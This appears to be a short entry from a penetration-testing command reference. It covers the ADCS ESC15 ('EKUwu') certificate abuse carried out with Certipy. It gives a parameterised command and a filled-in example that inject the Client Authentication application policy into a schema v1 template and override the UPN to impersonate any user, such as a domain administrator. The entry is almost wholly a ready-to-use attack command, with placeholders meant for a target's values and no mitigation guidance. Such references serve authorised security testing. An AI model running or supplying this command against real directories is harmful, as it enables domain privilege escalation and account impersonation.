Certipy ESC15 (Schema V1 EKUwu)

ESC15 / EKUwu: schema v1 templates honor Application Policies from the CSR, letting an enrollee inject Client Authentication EKU into a template that does not normally allow it. Combine with a SAN/UPN override to impersonate any user.

Tool
certipy
Category
Credential Attacks / ADCS (Certificate Abuse)
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

certipy req -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca-name>' -template '<v1-template>' -application-policies 'Client Authentication' -upn '<target>@<domain>'

Examples

certipy req -u jdoe@corp.local -p Pass -dc-ip 10.10.10.10 -ca CORP-CA -template WebServer -application-policies 'Client Authentication' -upn administrator@corp.local

Tags

certipy adcs esc15 ekuwu application-policies

References